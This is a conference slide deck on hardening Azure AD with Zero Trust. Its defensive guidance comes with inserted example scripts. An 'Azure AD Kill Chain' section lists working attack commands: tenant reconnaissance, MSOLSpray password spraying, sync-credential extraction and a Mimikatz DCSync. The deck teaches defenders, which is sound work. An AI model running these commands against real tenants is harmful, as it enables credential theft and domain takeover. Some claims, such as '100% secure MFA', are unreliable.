Thanks to all our partners!
27 October 2022 - PARIS
@IdentityDays #identitydays2022
Jean-François Apréa
CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist
MVP Security | MVP Cloud and Datacenter Management (16)
Author | Speaker | Trainer (MCT Alumni)
Seyfallah Tagrerout
CEO and Founder STC Consulting | Cloud and Security Architect
Microsoft Azure Specialist | Microsoft Zero Trust Specialist
MVP Azure and Enterprise Mobility (8)
Author | Speaker | Trainer
Apply the Zero Trust model for Hardening your Azure AD
Identity Days 2022
Zero Trust? It's urgent to get going, because it's urgent to be genuinely protected!
Agenda
• Azure AD & Microsoft Entra
• Zero Trust and the Microsoft vision
• Azure AD is Identity and Access Control centric
• Azure AD Kill Chain
• Azure AD Hardening with Zero Trust in mind 😊
• Good practices and a 12-step action plan
It is becoming difficult to stay up to date …
Hackers don't give a shit!
Source: Jean-Charles Duret-Ferrari
 About your project’s scope…
 It's managed by a third party…
 It’s a legacy system…
 It’s too critical to patch…
 You've always done it that way…
 About your Go-Live date…
 It’s only a Pilot/POC not production…
 About NDA…
 It was not a mandatory requirement…
 It is a non-exposed internal system…
 It is hard to change…
 It is handled in the Cloud…
 The vendor does not support this…
 It is an interim solution…
 It is encrypted on disk…
 You cannot explain the Risk to the Business…
 You have other priorities…
 You don’t have a Business justification…
 You cannot have ROI…
 You contracted out that risk…
Really, too many bad reasons!
Azure AD & Microsoft Entra
Azure Active Directory & Microsoft Entra
Azure Active Directory
 Identity & Access Management
 Inter-connected ecosystem
 Security
 Hybrid Cloud
 Several types of Identities
Microsoft Entra
• Azure Active Directory
• Microsoft Entra Permissions Management
• Microsoft Entra Verified ID
• Microsoft Entra Workload Identities
• Microsoft Entra Identity Governance
About Zero Trust and the Microsoft vision
Microsoft Zero Trust vision
Verify explicitly
Use least privileged access
Assume breach
Microsoft Zero Trust vision
Assume breach
Assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly.
Transforms overall thinking, strategy, and architectures from "safe network" to "open network".
Asset/Node = user, app, device, data, API, etc.
Verify explicitly
Protect assets against attacker control by explicitly validating that all trust and security decisions use all relevant available information and telemetry.
Reduces the "attack surface" of each asset.
Use least privilege access
Limit access of a potentially compromised asset, typically with just-in-time and just-enough-access (JIT/JEA) and risk-based policies like adaptive access control.
Reduces the blast radius of compromises.
Azure AD is Identity and Access Control centric
Azure AD Access Control plane
 Verification of each access attempt
 Access control to Apps and Data
 Azure AD signals
Never trust, always verify…
Azure AD Access Control
Azure AD Kill Chain ✨😯
Azure AD Kill Chain
How to get started 😊
Azure AD Kill Chain
Step by step progression 😯
1. Azure AD unauthenticated discovery
2. Search for a valid email account
3. Password spraying attack
4. Move to a user-authenticated session
5. Accounts: list synchronized and cloud accounts
6. Azure AD Connect: find Sync_Sync01_guid@domain.onmicrosoft.com and the AAD Connect VM name in the MSOL account
7. Now, by default, everything is possible!
8. If you become a local Administrator on AAD Connect, you can extract an encrypted version of the MSOL account passwords via the AAD Connect SQL database or directly from LSASS.exe using the MIMIKATZ tool!
9. From there, it is possible to carry out a DCSync attack to replicate all the password hashes of the AD domain! 😯
10. And finally, via Active Directory, exploit the AAD SSO feature by recovering the PASSWORD of AZUREADSSOACC$
Alternatively, at this point, it is possible to access the Azure portal without providing a password
So, the Azure AD Connect VM must be super secure
Azure AD Kill Chain
Tenant discovery 😯
https://login.microsoftonline.com/getuserrealm.srf?login=[USERNAME@DOMAIN]&xml=1
😯 First information available anonymously, without authentication 😯
About your tenant:
 Active or not?
 Name?
 Federated or not?
Azure AD Kill Chain
Tenant discovery 😯
Discovery and reconnaissance of the Azure tenant
Free PowerShell module to install: GitHub - Gerenios/AADInternals: AADInternals PowerShell module for administering Azure AD and Office 365
Get tenant name, branding and DNS name:
Get-AADIntLoginInformation -UserName xxxx.domain.onmicrosoft.com
Get tenant ID:
Get-AADIntTenantID -Domain testtenant.onmicrosoft.com
Get all additional domains added:
Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com
Get general tenant information:
Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com
😯 Third-party PowerShell modules to find more... 😯
Azure AD Kill Chain
Initial access + Password Spray / Brute Force 😯
MSOL Spray tool
https://github.com/dafthack/MSOLSpray
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password IdentityDays$Paris%2022
Basic sample password files are available here:
https://github.com/ohmybahgosh/RockYou2021.txt
Azure AD Kill Chain
MFA Attack + MFA Fatigue 😯
Phishing & Man in the middle
27/09/2022: MFA Fatigue leads to breach of UBER'S corporate users
https://veruscorp.com/mfa-fatigue-leads-to-breach-of-ubers-corporate-systems/
https://github.com/kgretzky/evilginx
Using FIDO2 hardware keys like YubiKey provides 100% secure MFA
Azure AD Kill Chain
Enumeration 😯
AzureAD PowerShell Module
PowerShell Gallery | AzureAD 2.0.2.140
Install-Module -Name AzureAD
Everything below works with a standard user, without special privileges!
Connect-AzureAD
Session state and details:
Get-AzureADCurrentSessionInfo
Tenant details:
Get-AzureADTenantDetail
List all AAD users:
Get-AzureADUser -All $true
Get specific user properties:
Get-AzureADUser -ObjectId test@tenanttest.onmicrosoft.com
Get users whose name contains the string "admin":
Get-AzureADUser -SearchString "admin"
Get all groups whose name contains "admin":
Get-AzureADGroup -All $true | ?{$_.DisplayName -match "admin"}
Get all groups synchronized from AD to AAD:
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
Get all cloud-only Azure AD groups:
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
Get all users with the Global Administrator role:
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get all compliant (Intune-managed) devices:
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq $true}
Get all registered apps:
Get-AzureADApplication -All $true
Other useful tools:
 Via Azure portal
 Via PowerShell
 Via Azure CLI
Warning: By default, an AAD user can 😯
 Access the list of all users, groups, applications, devices, roles, subscriptions
 Send invitations to Guest type accounts
 Create security groups
 Read group members
 Create a new app
 Add up to 50 Azure AD devices
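The default user permissions behind that warning can be audited and tightened with the Microsoft Graph PowerShell SDK. The block below is an added example, not code from the deck: the desired state is an assumption chosen for the example, and the permission-grant policy IDs are Microsoft's built-in ones.

```powershell
# Added example (not from the original deck): audit, then tighten, the
# Azure AD default user role permissions that make the enumeration above
# possible for any standard user. Requires the Microsoft.Graph SDK and an
# account holding Global Administrator or Privileged Role Administrator.
Connect-MgGraph -Scopes "Policy.ReadWrite.Authorization" | Out-Null

# Desired state (assumption for this example, adapt to your tenant):
# members may not register apps, create security groups or browse other
# users' profiles, and may only consent to low-impact, verified-publisher apps.
$DesiredPermissions = @{
    AllowedToCreateApps             = $false
    AllowedToCreateSecurityGroups   = $false
    AllowedToReadOtherUsers         = $false
    PermissionGrantPoliciesAssigned = @("ManagePermissionGrantsForSelf.microsoft-user-default-low")
}
# Guest invitations: only admins and members of the Guest Inviter role.
$DesiredInvitesFrom = "adminsAndGuestInviters"

function Get-DefaultUserPermissionFindings {
    # Compares the live authorization policy with the desired state and
    # returns one line per deviation (empty array = compliant).
    param([Parameter(Mandatory)] $Policy)
    $findings = @()
    $perms = $Policy.DefaultUserRolePermissions
    foreach ($name in "AllowedToCreateApps", "AllowedToCreateSecurityGroups", "AllowedToReadOtherUsers") {
        if ($perms.$name -ne $DesiredPermissions[$name]) {
            $findings += "$name = $($perms.$name) (expected $($DesiredPermissions[$name]))"
        }
    }
    # The "legacy" consent policy lets every user grant any app access to
    # their data; the user consent workflow from Part 8 needs it removed.
    if ($perms.PermissionGrantPoliciesAssigned -contains "ManagePermissionGrantsForSelf.microsoft-user-default-legacy") {
        $findings += "User consent is unrestricted (legacy consent policy assigned)"
    }
    if ($Policy.AllowInvitesFrom -ne $DesiredInvitesFrom) {
        $findings += "AllowInvitesFrom = $($Policy.AllowInvitesFrom) (expected $DesiredInvitesFrom)"
    }
    return $findings
}

function Set-HardenedDefaultUserPermissions {
    # Applies the desired state. Supports -WhatIf so the change can be
    # previewed first; AllowedToReadOtherUsers = $false also hides the
    # directory from people pickers, so test with a pilot before enforcing.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess("authorizationPolicy", "Restrict default user permissions")) {
        Update-MgPolicyAuthorizationPolicy `
            -DefaultUserRolePermissions $DesiredPermissions `
            -AllowInvitesFrom $DesiredInvitesFrom
    }
}

$policy   = Get-MgPolicyAuthorizationPolicy
$findings = Get-DefaultUserPermissionFindings -Policy $policy
if ($findings.Count -eq 0) {
    "Default user permissions already match the desired state."
} else {
    $findings | ForEach-Object { "FINDING: $_" }
    Set-HardenedDefaultUserPermissions -WhatIf      # drop -WhatIf to apply
}
```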
Azure AD Kill Chain
And finally, use of MSOL_* credentials 😯
Enumeration via the AD PowerShell module:
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
Enumeration via the Azure AD PowerShell module:
Get-AzureADUser -All $true | ?{$_.UserPrincipalName -match "Sync_"}
Once the AAD Connect server has been analyzed, the credentials are extracted:
Get-AADIntSyncCredentials
The end: MSOL_* account credentials + DCSync attack with MIMIKATZ
runas /netonly /user:amslab.corp\MSOL_782bef6aa0a9 cmd
Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLab\krbtgt /domain:amsLab.corp /dc:DC01.amsLab.corp"
Azure AD Hardening ✨👍
Azure AD Hardening
Inspired by Microsoft Entra
Based on customer Experience
 Security projects
 Assessment / audit missions
 Emergency operations
 Remediation
Always start with Azure AD Quick Wins 👍
Part1: Strengthen your secrets
1. Use Microsoft Secure Score
 Deploy MFA for EVERYONE
 Enable Identity Protection (P2)
2. Use Azure AD Smart Lockout
 For Azure AD cloud accounts
 For hybrid accounts
3. Deploy passwordless authentication
 FIDO2 key
 Microsoft Authenticator
4. Create TWO recovery (break-glass) accounts
 Only in Azure AD
 Do not enable synchronization
 Do not use MFA
 Do not use FIDO2 keys
 Disable password expiration
 Activate strong auditing on these two accounts with:
   Azure Log Analytics
   Azure Sentinel
   Cloud App Security (MCAS)
Part1: Hardening Azure MFA
1. MFA Protection
2. Auth Strengths
3. MFA Fraud alert
4. Identity Protection
Part2: Conditional Access Design
Scope audience
 Regular users
 High Privilege Users
 Guest / External Users
 Workload identities
Logical separation in AAD:
 Flexibility
 Granularity
 Lower risk of error
 More “readability”
 Troubleshooting
 Governance
Best Practices
 Always test behavior
 What if?
 Report-only mode

Area: Authentication Policies
- Enforce MFA for all administrators
- Enforce MFA for all standard users
- Enforce MFA for all Guest users
- Block legacy authentication
- Reduce attack surface

Area: Device Access Policies
- Block unsupported device platforms
- Require managed devices (Endpoint Manager) for admin stations
- Require approved app for mobile access (MAM)
- Require managed devices
- Specific Conditional Access for macOS (if needed)

Area: Strict Security Policies
- Block MFA registration from untrusted locations
- Require Terms of Use for: all administrators / Guest access / consultants
- Control sign-in frequency
- Disable persistent browser sessions
- Block foreign locations
- Require trusted location for all admins
- User risk-based and sign-in risk-based policies (via Identity Protection)
- Authentication context: PIM / MIP-labeled SharePoint site / Cloud App Security upload and download
- Privileged access via filters for devices
- Conditional Access for workload identities
- Block all cloud apps except Teams / SPO for Guest access
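As an added example of the "report-only first" practice above (not the deck's own code), this script creates the "Block legacy authentication" policy from the table with the Microsoft Graph SDK in report-only state, excludes the break-glass group, and then reads the sign-in log to see what the policy would have blocked. The group name and policy name are placeholders.

```powershell
# Added example (not from the original deck): the "Block legacy
# authentication" policy from the table, created in report-only mode with
# the break-glass group excluded, then evaluated from the sign-in logs.
# Requires the Microsoft.Graph SDK; group and policy names are placeholders.
Connect-MgGraph -Scopes "Policy.ReadWrite.ConditionalAccess", "Policy.Read.All",
                        "Application.Read.All", "Group.Read.All",
                        "AuditLog.Read.All", "Directory.Read.All" | Out-Null

$BreakGlassGroupName = "SG-BreakGlass-Accounts"   # placeholder: group holding the two recovery accounts

function New-ReportOnlyLegacyAuthBlock {
    # Builds the policy body and creates it. A "block" policy is never
    # created without an exclusion for the recovery accounts, hence the
    # mandatory -ExcludeGroupId parameter.
    param([Parameter(Mandatory)] [string] $ExcludeGroupId)
    $body = @{
        displayName = "CA001 - Block legacy authentication (report-only)"
        # Report-only: evaluated and written to the sign-in logs, never
        # enforced. Switch state to "enabled" after the what-if review.
        state       = "enabledForReportingButNotEnforced"
        conditions  = @{
            # Legacy clients (basic-auth IMAP/POP/SMTP, older Office, EAS)
            # cannot satisfy MFA, so they are the path around it.
            clientAppTypes = @("exchangeActiveSync", "other")
            applications   = @{ includeApplications = @("All") }
            users          = @{
                includeUsers  = @("All")
                excludeGroups = @($ExcludeGroupId)
            }
        }
        grantControls = @{ operator = "OR"; builtInControls = @("block") }
    }
    return New-MgIdentityConditionalAccessPolicy -BodyParameter $body
}

function Get-ReportOnlyFailures {
    # Returns the sign-ins of the last $Hours hours that the policy would
    # have blocked (per-policy result "reportOnlyFailure"), one row each.
    param([Parameter(Mandatory)] [string] $PolicyId, [int] $Hours = 24)
    $since   = (Get-Date).ToUniversalTime().AddHours(-$Hours).ToString("yyyy-MM-ddTHH:mm:ssZ")
    $signIns = Get-MgAuditLogSignIn -Filter "createdDateTime ge $since" -All
    foreach ($s in $signIns) {
        $hit = $s.ConditionalAccessPolicies |
               Where-Object { $_.Id -eq $PolicyId -and $_.Result -eq "reportOnlyFailure" }
        if ($hit) {
            [pscustomobject]@{
                Time      = $s.CreatedDateTime
                User      = $s.UserPrincipalName
                ClientApp = $s.ClientAppUsed
                App       = $s.AppDisplayName
                IP        = $s.IPAddress
            }
        }
    }
}

$group = Get-MgGroup -Filter "displayName eq '$BreakGlassGroupName'"
if (-not $group) { throw "Break-glass group not found: refusing to create a block policy without the exclusion." }

$policy = New-ReportOnlyLegacyAuthBlock -ExcludeGroupId $group.Id
"Created policy $($policy.Id) in state $($policy.State)"

# Let the policy collect data for a day, then review who still uses legacy
# protocols before flipping the state to "enabled".
$wouldBlock = @(Get-ReportOnlyFailures -PolicyId $policy.Id -Hours 24)
"$($wouldBlock.Count) sign-in(s) would have been blocked in the last 24h"
$wouldBlock | Group-Object User | Sort-Object Count -Descending | Format-Table Count, Name -AutoSize
```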
Part3: Use PIM (Privileged Identity Management, Azure AD P2)
PIM Best Practices
 Enable PIM for privileged accounts
 Enable PIM for all admin roles (Zero Trust)
 Configure each role with MFA
 For a Global Admin account, grant 2H max (Zero Trust)
 Think about the default duration: Permanent for partners
 Configure email notifications to track usage
 Configure Access Reviews for PIM every week
 Activate the Privileged Access group
Part4: Use Microsoft Defender for Identity
Why use Microsoft Defender for Identity?
 Hyperscale SaaS protection in Azure
 Defender for Cloud App integration
 Multi-forest support
 Detection of DC Shadow
 Continuous updates in SaaS mode
 ATA Sensor & ATA Sensor Standalone
 Included with EMS E5, M365 E5 and M365 Security E5
Part5: Identity Governance – Use new Defender for Identity workflows
Figure: new-hire onboarding workflow, tasks shown on the slide
 Trigger: start date
 Create user account (status: disabled)
 Generate Temporary Access Pass (TAP)
 Send email to hiring manager with TAP
 Group assignments
 Enable user account
 Send welcome email to new hire
 Send email to onboarding DL
 Add user to Teams "New Hires" channel
 Launch custom Logic Apps workflow
Part6: Management of external identities and collaboration
Part6: External identities and the new cross-tenant feature
New Cross-tenant feature best practices
 Use case 1: Configure B2B Collaboration
 Use case 2: Configure B2B Direct Connect
 Configure Inbound in Granular Mode with MFA + Trust Compliance Device Claims
 Configure Outbound with granularity and scope your groups
 Block all B2B collaboration Outbound by default
 Use the Shared Channel
Part7: Protect yourself against Guest and External users with 9 control points
ID | Action | Impact
01 | Dedicated Conditional Access for MFA | Medium
02 | Dynamic group including all External / Guest users | Low
03 | CA hardening: block all cloud apps except Teams / SPO | High
04 | CA Terms of Use | Medium
05 | Restriction: prevent download, web-only access for sensitive Teams / SharePoint sites | High
06 | Session timeout (daily MFA / authentication) | High
07 | Access review for guest accounts | Medium
08 | Sensitivity Labels for M365 groups (Teams and SharePoint Online) | High
09 | Dedicated audit log for Guest / External user access | High
Part8: Protect your Workload Identities
68% of workloads can access Sensitive Data and Assets
Source: SCIM Quarterly Analysis, July 7th, 2022
Figure: Human identities vs. Machine identities, about 5 machine IDs for 1 human ID
Source: Microsoft Security internal research 2021
Figure: Human identities vs. Machine identities, future: about 20 machine IDs for 1 human ID
 1: Deploy Access Reviews for SPNs
 2: Configure Conditional Access policies for workload identities
 3: Deploy AAD Identity Protection
 4: Set up the user consent workflow
 5: Audit and log with Defender for Cloud Apps / Azure Sentinel
Part9: Management of external identities and collaboration
Part10: to go beyond…
User Access Strategy
 User admin (cloud only)
 PIM with the necessary rights
   Global Admin: 2h
   Other: 4h
 MFA / Passwordless FIDO2
 Conditional Access:
   Scope: User Admins
   Exclude: Break Glass accounts
   Device: Windows
   Location: Trusted Location
   Grant: Require device to be marked as compliant
 Identity Protection
   Sign-in risk
   User risk
 Password Protection
Privileged Access Workstation
 Azure AD Autopilot profile
 Compliance with Endpoint Manager
 Security & hardening device profile
 Security baseline
 Deny BYOD
 Windows Update setup
 Defender for Endpoint: integration with Endpoint Manager
Part11: The tomorrow model...
Enterprise Access model
 Tier 0
   Access Control Plane
   Management
 Tier 1
   Management Plane
   Data management
   Application
 Tier 2
   User access
   Application access (API, …)
Part12: SecOps
A SecOps implementation is essential
 Management of unified alerts
 Management of unified incidents
 Log management / redirection
 Proactivity
 Automatic playbook trigger via Sentinel (remember to add the Azure AD Data Connectors)
 Remember to have a real detection / hunting and response strategy
 Don't forget "hunting" with KQL
 Use the Microsoft 365 Defender "Admin Center"
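Part 1 asks for strong auditing of the two recovery accounts and Part 12 for hunting with KQL; the script below, an added example and not the deck's own code, runs one hunting query over SigninLogs and AuditLogs from PowerShell against the Sentinel workspace. The workspace ID and account names are placeholders.

```powershell
# Added example (not from the original deck): hunt for any activity involving
# the two break-glass (recovery) accounts from Part 1. Since those accounts
# are never used day to day, every hit must match a documented emergency.
# Requires Az.Accounts + Az.OperationalInsights and the Azure AD Data
# Connector feeding SigninLogs/AuditLogs into the Sentinel workspace.
# Workspace ID and UPNs below are placeholders.
Connect-AzAccount | Out-Null
$WorkspaceId    = "00000000-0000-0000-0000-000000000000"
$BreakGlassUpns = @("bg-admin-1@contoso.onmicrosoft.com", "bg-admin-2@contoso.onmicrosoft.com")

function New-BreakGlassHuntQuery {
    # Builds the KQL: sign-ins BY the accounts plus directory changes TO them
    # (password reset, role assignment, MFA method change, ...).
    param([Parameter(Mandatory)] [string[]] $Upns, [int] $Hours = 24)
    $list = ($Upns | ForEach-Object { '"' + $_ + '"' }) -join ", "
    $kql = @"
let BreakGlass = dynamic([$list]);
SigninLogs
| where TimeGenerated > ago(${Hours}h)
| where UserPrincipalName in~ (BreakGlass)
| project TimeGenerated, Activity = "SignIn", Actor = UserPrincipalName,
          Detail = strcat(AppDisplayName, " result=", ResultType, " ip=", IPAddress, " ca=", ConditionalAccessStatus)
| union (
    AuditLogs
    | where TimeGenerated > ago(${Hours}h)
    | mv-expand TargetResources
    | extend TargetUpn = tostring(TargetResources.userPrincipalName)
    | where TargetUpn in~ (BreakGlass)
    | project TimeGenerated, Activity = OperationName,
              Actor = tostring(InitiatedBy.user.userPrincipalName),
              Detail = strcat("target=", TargetUpn, " result=", Result)
)
| order by TimeGenerated desc
"@
    return $kql
}

function Invoke-BreakGlassHunt {
    # Runs the query and returns the matching rows (empty = expected state).
    param([Parameter(Mandatory)] [string] $WorkspaceId, [string[]] $Upns, [int] $Hours = 24)
    $kql  = New-BreakGlassHuntQuery -Upns $Upns -Hours $Hours
    $resp = Invoke-AzOperationalInsightsQuery -WorkspaceId $WorkspaceId -Query $kql
    return @($resp.Results)
}

$hits = Invoke-BreakGlassHunt -WorkspaceId $WorkspaceId -Upns $BreakGlassUpns -Hours 24
if ($hits.Count -eq 0) {
    "No break-glass activity in the last 24h (expected)."
} else {
    "ALERT: $($hits.Count) break-glass event(s); each must match a documented emergency."
    $hits | Format-Table TimeGenerated, Activity, Actor, Detail -AutoSize
}
```

Once the hand-run query is confirmed, the same KQL belongs in a Sentinel scheduled analytics rule with a threshold of zero, so the alert fires without anyone having to remember to run it.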
Conclusion
Zero Trust smooth deployment in 12 steps
Think hybrid and protect your on-premises Active Directory environment!
1. Use Azure AD as your IAM
2. Manage identity and access
3. Provision users
4. Control all authentications
5. Implement strong and secure authentications
6. Evaluate authentications and credentials
7. Determine trusted zones
8. Determine resource access
9. Apply minimum privileges
10. Secure administrative rights
11. Take advantage of Conditional Access
12. Train continuously!
Figure: the six focus areas shown on the slide
 Modernize identity and device management
 Consolidation, then legacy infrastructure cleanup
 Configure secure access for all types of users
 Secure your hybrid environment
 Strong authentications, conditional access and intelligent strategies
 Secure experience for all users
Identity Days 2021
Finally, our Zero Trust "To-do list"
Microsoft Documentation!
Zero Trust Document Center: https://docs.microsoft.com/en-us/security/zero-trust/
Monitor your Azure AD Secure Score: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity-secure-score
Integrate your Apps into Azure AD: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an-application-integration
Enable PHS and do not use PTA or ADFS federation
Enable Seamless SSO and minimize the use of ADFS On-Premise
Azure MFA + Passwordless with FIDO2 (Yubico, …)
Use PIM for IT teams
Use Azure AD Identity Protection for everyone
Privileged Accounts | backup accounts | MFA | Passwordless
Security Update Guide: patch and patch again! https://msrc.microsoft.com/update-guide/
Conditional Access
 MFA for Guests
 MFA for everyone
 Access policies and trusted locations
 Test | What If?
Reports - SecOps
 Devices
 Azure AD logs (sign-ins and applications)
 Users at risk: logins, locations, IP, GPS, Cloud App Security
 Azure Sentinel
Passwords
 SSPR
 Smart Lockout Azure AD / Active Directory
 Password Protection
Education & communication with users
 Internal training / cyber best practices
@IdentityDays #identitydays2022 Thanks to all ✨👍

 
Information Barriers in MS Teams
Information Barriers in MS TeamsInformation Barriers in MS Teams
Information Barriers in MS Teams
 
Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish Kalamati
 
Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022
 

More from Identity Days

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisIdentity Days
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Identity Days
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Identity Days
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiqueIdentity Days
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...Identity Days
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Identity Days
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...Identity Days
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneIdentity Days
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Identity Days
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Identity Days
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Identity Days
 
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADIdentity Days
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGIdentity Days
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxIdentity Days
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Identity Days
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryIdentity Days
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! Identity Days
 
CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?Identity Days
 
Mise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement HybrideMise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement HybrideIdentity Days
 
La politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAPLa politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAPIdentity Days
 

More from Identity Days (20)

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromis
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratique
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant Intune
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
 
